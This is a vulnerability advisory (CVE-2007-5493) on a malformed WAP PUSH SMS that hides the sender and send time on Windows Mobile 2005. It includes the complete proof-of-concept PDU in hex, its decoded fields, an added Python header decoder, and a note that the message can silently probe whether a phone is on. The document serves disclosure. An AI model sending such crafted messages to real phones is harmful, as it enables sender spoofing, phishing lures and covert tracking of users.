Credit:
The information has been provided by Ollie Whitehouse.
The original article can be found at: http://www.securityfocus.com/bid/26019
Symantec discovered that a slightly malformed WAP PUSH message could be used to hide the originating sender of the message on Windows Mobile 2005. The original PDU can be seen in [1]. The following PDU causes the Pocket PC Phone Edition SMS handler to decode it incorrectly, with the result that both the sending telephone number and the sending time are incorrect.
[1] PDU (Line wrapped)
079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA
AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62
756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62
696C652E636F6D000101
The decode of the PDU can be seen in [2]. This decode was achieved with PDUSpy from http://www.nobbi.com/pduspy.htm. When this message is received by a SmartPhone it will be silently discarded, which can also be useful to an attacker who wishes to ascertain if a cellphone is on without alerting the user through SMS delivery receipts.
[2] Decode of PDU from PDUSpy
PDU LENGTH IS 118 BYTES
ADDRESS OF DELIVERING SMSC
NUMBER IS : +447785016005
TYPE OF NR. : International
NPI : ISDN/Telephone (E.164/163)
MESSAGE HEADER FLAGS
MESSAGE TYPE : SMS SUBMIT
REJECT DUPLICATES : NO
VALIDITY PERIOD : RELATIVE
REPLY PATH : NO
USER DATA HEADER : PRESENT
REQ. STATUS REPORT : NO
MSG REFERENCE NR. : 34 (0x22)
DESTINATION ADDRESS
NUMBER IS : +447716299660
TYPE OF NR. : International
NPI : ISDN/Telephone (E.164/163)
PROTOCOL IDENTIFIER (0x00)
MESSAGE ENTITIES : SME-to-SME
PROTOCOL USED : Implicit / SC-specific
DATA CODING SCHEME (0x04)
AUTO-DELETION : OFF
COMPRESSION : OFF
MESSAGE CLASS : NONE
ALPHABET USED : 8bit data
VALIDITY OF MESSAGE : 24.0 hrs
USER DATA PART OF SM
USER DATA LENGTH : 96 octets
UDH LENGTH : 6 octets
UDH : 05 04 0B 84 23 F0
UDH ELEMENTS : 05 - Appl. port addressing 16bit
4 (0x04) Bytes Information Element
09200 : SOURCE port is: allocated by IANA
02948 : DESTINATION port is: allocated by IANA
--- DATA ----------------------
05 04 0B 84 23 F0
USER DATA (TEXT) : % jE
symantec Symantec
bulkSMS (Unregistered Ver) -
LogixMobile.com
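As an added example (not part of the original advisory and not PDUSpy's code), the following Python decodes the header fields of PDU [1] by hand so that the values in [2] can be checked independently. It assumes the SMS-SUBMIT layout with 8-bit user data seen in this PDU; the function and dictionary key names are our own.

```python
# Added example: minimal SMS-SUBMIT header decoder (GSM 03.40 layout).
# Assumes 8-bit user data, as in PDU [1]; all names here are our own.
PDU_HEX = (  # PDU [1] from this advisory, unwrapped
    "079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA"
    "AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62"
    "756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62"
    "696C652E636F6D000101"
)

def semi_octets(data, toa):
    """Decode a nibble-swapped BCD number; type-of-address 0x91 = international."""
    digits = "".join(f"{b & 0x0F:X}{b >> 4:X}" for b in data).rstrip("F")
    return ("+" if toa == 0x91 else "") + digits

def decode_submit(pdu_hex):
    raw = bytes.fromhex(pdu_hex)
    pos = 1 + raw[0]                        # skip SMSC length octet + SMSC field
    out = {"smsc": semi_octets(raw[2:pos], raw[1])}
    first = raw[pos]
    out["mti"] = first & 0x03               # 1 = SMS-SUBMIT
    vpf = (first >> 3) & 0x03               # 2 = relative validity period
    udhi = bool(first & 0x40)               # user data header indicator
    out["mr"] = raw[pos + 1]                # message reference
    ndigits, toa = raw[pos + 2], raw[pos + 3]
    pos += 4
    alen = (ndigits + 1) // 2               # address length is given in digits
    out["dest"] = semi_octets(raw[pos:pos + alen], toa)
    pos += alen
    out["pid"], out["dcs"] = raw[pos], raw[pos + 1]
    pos += 2 + {0: 0, 2: 1}.get(vpf, 7)     # VP: absent, 1 octet, or 7 octets
    udl = raw[pos]
    ud = raw[pos + 1:pos + 1 + udl]         # 8-bit data: UDL counts octets
    if len(ud) != udl:
        raise ValueError("user data shorter than TP-UDL")
    out["udl"], out["ports"] = udl, None
    if udhi:
        udh, i = ud[1:1 + ud[0]], 0
        while i + 2 <= len(udh):            # walk IEI / length / value triples
            iei, ielen = udh[i], udh[i + 1]
            if iei == 0x05 and ielen == 4:  # 16-bit application port addressing
                out["ports"] = (int.from_bytes(udh[i + 2:i + 4], "big"),   # dest
                                int.from_bytes(udh[i + 4:i + 6], "big"))   # source
            i += 2 + ielen
        ud = ud[1 + ud[0]:]
    # Destination port 2948 is the IANA-registered WAP connectionless push port.
    out["wap_push"] = out["ports"] is not None and out["ports"][0] == 2948
    out["payload"] = ud
    return out
```

Calling `decode_submit(PDU_HEX)` reproduces the SMSC, destination, message reference, and port values listed in [2].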
Vendor Response:
A vulnerability has been discovered in the SMS handler. If a malicious message with no sender was received by a user on their device, the user may be enticed into taking action or clicking the URI that could lead to a second order attack.
Mitigating Factors: By default, Windows Mobile device policy requires SI messages to be authenticated. The Mobile Operators have the ability to change the policy to not require authentication in order for 3rd party ring tones and other SI messages.
Microsoft will look into a different architecture in future versions.
Recommendation:
Contact your mobile operator to ensure the proper policy is set on your device.
CVE Information:
CVE-2007-5493